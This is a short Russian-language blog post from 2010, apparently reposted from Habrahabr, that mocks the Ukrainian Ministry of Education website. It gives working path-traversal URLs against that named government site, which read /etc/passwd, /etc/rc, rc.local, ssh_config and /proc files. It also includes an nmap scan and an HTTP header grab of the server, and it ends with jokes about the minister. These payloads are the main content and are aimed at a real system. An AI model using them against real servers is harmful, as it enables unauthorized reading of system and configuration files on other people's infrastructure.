Министерство образования и науки Украины… Образование 2.0 говорите?
Сегодня товарищи поделились интересной ссылкой

* www.mon.gov.ua/main.php?query=../../../etc/passwd

Стало интересно глянуть, а чего там открыто?

Бесхитростно:

$ nmap www.mon.gov.ua

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2010-04-09 10:40 EEST
Interesting ports on 212.111.193.189:
Not shown: 1679 filtered ports
PORT STATE SERVICE
80/tcp open http

Nmap finished: 1 IP address (1 host up) scanned in 76.253 seconds


Что-ж… Тоже вариант… 80 порт и только… Жаль…

$ w3m -dump_head www.mon.gov.ua
HTTP/1.1 200 OK
Date: Fri, 09 Apr 2010 07:43:50 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html


Ну тогда стал прорезаться просто исследовательский азарт:

* www.mon.gov.ua/main.php?query=../../../etc/rc
* www.mon.gov.ua/main.php?query=../../../etc/rc.local
* www.mon.gov.ua/main.php?query=../../../etc/ssh/ssh_config
* www.mon.gov.ua/main.php?query=../../../proc/cpuinfo
* www.mon.gov.ua/main.php?query=../../../proc/meminfo




http://habrahabr.ru/blogs/infosecurity/90473/

ппц ребята - какой министр, такой и сайт

какие министрЫ